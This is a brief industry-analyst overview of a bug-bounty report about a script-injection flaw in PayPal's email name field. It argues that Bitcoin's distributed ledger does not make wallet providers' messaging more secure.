The practice of offering bounties for finding and reporting exploitable flaws in code continues to pay dividends for financial institutions and now financial technology companies. The article brings to attention the recent example of one of these flaws with payment service provider PayPal.
The way this exploit works is by sending emails with malicious code through an existing PayPal account. Sending an email to a different PayPal user requires users to fill in a name – usually first and last name – but it turned out that entry field could be filled with random code, including malicious scripts.
In relating the finding and subsequent report of the flawed code the author demonstrates how even well-known payment systems are subject to attack from “blackhats”, and how the efforts of “whitehats” are identifying holes in the defenses. That said, the author then makes a leap to conclude that the flaws in PayPal’s email confirmation system demonstrate the inferiority of a centralized record keeping system to a distributed ledger system such as Bitcoin.
While the repetitive verification built into the Bitcoin blockchain does indeed guard against rewriting the ledger and thereby secures acknowledged ownership of Bitcoin asset, the communication aspect of Bitcoin Wallet providers do not benefit from any additional security by right of partaking in the Bitcoin blockchain.
Mercator Advisory Group recognizes the particular strengths that Bitcoin blockchain affords, but impervious email messaging cannot be counted as one.
Overview by Joseph Walent, Senior Analyst, Emerging Technology Advisory Service at Mercator Advisory Group
Read the full story here